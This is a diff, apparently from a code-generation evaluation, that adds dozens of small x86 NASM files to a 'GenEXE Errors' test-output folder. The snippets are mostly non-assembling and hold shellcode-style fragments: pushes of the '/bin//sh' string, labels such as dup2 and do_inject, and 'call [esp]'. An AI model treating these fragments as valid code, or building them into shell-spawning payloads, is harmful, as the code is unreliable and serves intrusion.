encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.obj new file mode 100644 index 0000000000000000000000000000000000000000..840e83c4b1a74934a2ae8b8bc27c775b39660d17 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.asm new file mode 100644 index 0000000000000000000000000000000000000000..a92db5b91c4c044a34369641cbc11bc60efbb00d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ecx, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.obj new file mode 100644 index 0000000000000000000000000000000000000000..ae420cc1997c288bc43ea710f8b470f300b5463c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_84.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.asm new file mode 100644 index 0000000000000000000000000000000000000000..012375c46c38782e2e89b218011268fc0926a87e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax,eax + xor ebx,ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.obj new file mode 100644 index 0000000000000000000000000000000000000000..b7a3827e35281154ce5faba548a5565bd4ae3ec1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_85.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.asm new file mode 100644 index 0000000000000000000000000000000000000000..fea079ae768d8e43a290074f9bec97258bbe09e1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub eax, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.obj new file mode 100644 index 0000000000000000000000000000000000000000..a4234971cce710caa0478b4dd4e67f1cbd94deec Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_89.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.obj new file mode 100644 index 0000000000000000000000000000000000000000..76d31641ce6e46ad01b421a839a4d21877de163f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_9.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.asm new file mode 100644 index 0000000000000000000000000000000000000000..045a4ad945a2e9ec8431ba746b1dde15ed07a4e1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.asm @@ -0,0 +1,14 @@ +section .data + +dup2 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0xff + jne dup2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.obj new file mode 100644 index 0000000000000000000000000000000000000000..394cd6a0d26aae7bb11305fd4a36850db1820af2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_92.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.asm new file mode 100644 index 0000000000000000000000000000000000000000..e3fcccd9b2aa268bb04386df995a42f9739ff31f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + call [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.obj new file mode 100644 index 0000000000000000000000000000000000000000..ea705b631f9319f76c3fc8fea9e12bbb5dadfb6c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_97.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.asm new file mode 100644 index 0000000000000000000000000000000000000000..a09f251b2c8e5048e2e285280ed15b3ebd1cafae --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg edx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.obj new file mode 100644 index 0000000000000000000000000000000000000000..8460bd580250cec14babc97211a502a628f5d6d6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_102.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_109.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_109.asm new file mode 100644 index 0000000000000000000000000000000000000000..ed7b92a7e15421f0617fd2c5adac27276c95784c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_109.asm @@ -0,0 +1,95 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero6e69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero6e69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.asm new file mode 100644 index 0000000000000000000000000000000000000000..f738a3482c3cd1fba06025eda9fa1020c0ce0010 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov esi, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.obj new file mode 100644 index 0000000000000000000000000000000000000000..a6ecd5bd2372699dc026f6a798c084dc15f02400 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_11.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.asm new file mode 100644 index 0000000000000000000000000000000000000000..bdb454c827f5d3a8f510a975b6d505ab9d9418a3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg eax, ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.obj new file mode 100644 index 0000000000000000000000000000000000000000..581df1e2143211316d763195612feee714396ccb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_111.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.asm new file mode 100644 index 0000000000000000000000000000000000000000..85062d68c54864b6473e6ba6a1fc54514d9da085 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.asm @@ -0,0 +1,13 @@ +section .data + +args equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, [args] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.obj new file mode 100644 index 0000000000000000000000000000000000000000..3b729cb9a0592a580ff830142ecc4661575e445f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_112.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.asm new file mode 100644 index 0000000000000000000000000000000000000000..a82e50c412f61c82ac3b0f15716b7fb323af2e5c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.obj new file mode 100644 index 0000000000000000000000000000000000000000..39b5e74c9d45fbaf6545962d7768ac4af1055ec2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_115.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.asm new file mode 100644 index 0000000000000000000000000000000000000000..3a205c91789ec7c55496f15d0d0b2fe1996a506d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.asm @@ -0,0 +1,22 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov cl, 0x68732f2f + add cl, 0x68732f + add cl, 0x6e69622f + add cl, 0x69622f + add cl, 0x69622f + add cl, 0x69622f + add cl, 0x69622f + add cl, 0x6e69622f + add cl, 0x6e69622f + add cl, 0x69622f2f + add cl, 0x6 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.obj new file mode 100644 index 0000000000000000000000000000000000000000..ccaa025414eaf759269390c892ad171f70c8885c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_118.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.obj new file mode 100644 index 0000000000000000000000000000000000000000..c7f152baee75708c15e3303c3071a186a1102944 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_122.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_126.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_126.asm new file mode 100644 index 0000000000000000000000000000000000000000..ed7b92a7e15421f0617fd2c5adac27276c95784c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_126.asm @@ -0,0 +1,95 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero6e69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero6e69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.asm new file mode 100644 index 0000000000000000000000000000000000000000..68f52c3b3069870fa672237aca96a02f582ada8f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.asm @@ -0,0 +1,13 @@ +section .data + +_start equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jns _start-0x24 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.obj new file mode 100644 index 0000000000000000000000000000000000000000..d2e0e75f38fa8228f847e345ff04fe5759119765 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_128.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.obj new file mode 100644 index 0000000000000000000000000000000000000000..409822c82783e8690d74ac55655067ceecda6e04 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_129.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.asm new file mode 100644 index 0000000000000000000000000000000000000000..5007834e6854c3ca0cec5036d46970d735e02033 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section . + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.obj new file mode 100644 index 0000000000000000000000000000000000000000..a984b11b52ccc94b2ed5de7aef104c86494b3d13 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_13.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.asm new file mode 100644 index 0000000000000000000000000000000000000000..6bad7fe046ecbfcc57ee260584c5528405ae00f9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ax, 1000h + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.obj new file mode 100644 index 0000000000000000000000000000000000000000..508bcef61bcf71aecd798417f14216788147f20b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_133.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.asm new file mode 100644 index 0000000000000000000000000000000000000000..93ab3132e5d7a9f6c6631ac5113bcadd4306b923 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.asm @@ -0,0 +1,13 @@ +section .data + +var3 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, var3 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.obj new file mode 100644 index 0000000000000000000000000000000000000000..bd1243fa75ec845765f9e8e4ff9728a4e7fd9fba Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_136.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.asm new file mode 100644 index 0000000000000000000000000000000000000000..a200b187a711beead94212af26b4282e0cb0e77f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + open_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.obj new file mode 100644 index 0000000000000000000000000000000000000000..b5240e7a5f8374068ee30b6418d822273a296df2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_137.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.asm new file mode 100644 index 0000000000000000000000000000000000000000..c3ff0bbbf2eadc990a6cd2a1e72049ff1c12f334 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _switch: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.obj new file mode 100644 index 0000000000000000000000000000000000000000..1ee332103803533c157c2fcdef6379bcbfdd32dc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_139.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.asm new file mode 100644 index 0000000000000000000000000000000000000000..e878ca80cf3db9e7a898318c0e9aa8eace3ac416 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, byte [0xa4] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.obj new file mode 100644 index 0000000000000000000000000000000000000000..16f233fc303a69aabe7490c76f754d534f736468 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_140.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.asm new file mode 100644 index 0000000000000000000000000000000000000000..3be5ba15021a9824919446a9f97a2fdcd1734317 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + mov eax, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.obj new file mode 100644 index 0000000000000000000000000000000000000000..d541999668cad022e1484e8699a115a9a4955296 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_142.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.asm new file mode 100644 index 0000000000000000000000000000000000000000..03313c95fad31286aba34b30e76b830054542239 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.obj new file mode 100644 index 0000000000000000000000000000000000000000..8264b9b33d7b385a3d2cf0da097141a98d76b4e4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_143.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_144.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_144.asm new file mode 100644 index 0000000000000000000000000000000000000000..22d134a7faf9b3fe61feea0f4e06375cd498c564 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_144.asm @@ -0,0 +1,15 @@ +section .data + +do_inject equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp al, 2 + jne while + jmp do_inject + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.obj new file mode 100644 index 0000000000000000000000000000000000000000..3e5cd0bae3c6474e550b9cddfd939db7227c57ad Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_146.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.asm new file mode 100644 index 0000000000000000000000000000000000000000..07e428a20142f74f2560544f05b465a27768985e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.asm @@ -0,0 +1,28 @@ +section .data + 